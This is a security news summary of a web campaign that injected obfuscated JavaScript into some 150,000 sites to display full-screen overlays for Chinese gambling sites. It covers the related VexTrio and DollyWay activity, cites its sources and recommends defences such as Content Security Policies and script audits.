A widespread cyber campaign has compromised approximately 150,000 legitimate websites by injecting malicious JavaScript code that redirects visitors to Chinese-language gambling platforms. The attack, which leverages iframe injections to display deceptive full-screen overlays, has been active for years but has recently expanded in scale and sophistication. Security analysts note that the threat actors behind this operation have updated their techniques while maintaining the same core method of exploitation.
TL;DR: Key Points
- Scope: Over 150,000 websites infected with malicious JavaScript.
- Technique: Iframe injections used to display fraudulent gambling overlays.
- Payload Delivery: Scripts hosted on domains like
zuizhongyj[.]comwith obfuscation to evade detection. - Targets: Primarily Chinese-speaking users in China, Hong Kong, and the U.S.
- Mitigation: Implement Content Security Policies (CSPs) and audit third-party scripts.
Attack Mechanics and Infrastructure
The campaign relies on injecting malicious JavaScript into vulnerable websites, often through outdated plugins or server-side PHP code. Once executed, the script loads an iframe that overlays the legitimate site with a full-screen gambling advertisement, mimicking well-known platforms like Bet365. The payload is hosted on intermediary domains such as zuizhongyj[.]com, which use hexadecimal encoding and HTML entity tricks to bypass security filters.
“The threat actor has slightly revamped their interface but is still relying on an iframe injection to display a full-screen overlay in the visitor’s browser,” said Himanshu, a security analyst at c/side.
Broader Campaigns and Threat Actors
This operation shares similarities with the DollyWay malware, which has been linked to the cybercriminal network VexTrio. Since 2016, VexTrio has compromised over 20,000 sites, monetizing traffic through ad brokers like LosPollos and PropellerAds. The group has demonstrated adaptability, shifting command-and-control (C2) infrastructure to platforms like Telegram after previous disruptions.
Mitigation and Defense Strategies
To defend against such attacks, organizations should:
- Regularly audit third-party scripts and plugins for unauthorized modifications.
- Implement Content Security Policies (CSPs) to restrict unauthorized script execution.
- Monitor for unexpected iframes or redirects in web traffic.
Conclusion
This campaign highlights the persistent threat of client-side attacks, particularly those leveraging obfuscation and deceptive overlays. Security teams should prioritize script integrity checks and adopt proactive measures to detect and block such injections. As attackers continue to refine their techniques, maintaining vigilance and applying layered defenses will be essential in mitigating risks.
References
- “150,000 Sites Compromised by JavaScript Injection Promoting Chinese Gambling Platforms”, The Hacker News. [Accessed: 2025-03-01].
- “Threat Actors Compromise 150,000 Websites”, GBHackers. [Accessed: 2025-03-01].
- “Over 150K Websites Hit by Full-Page Hijack Linking to Chinese Gambling Sites”, c/side Analysis. [Accessed: 2025-03-01].
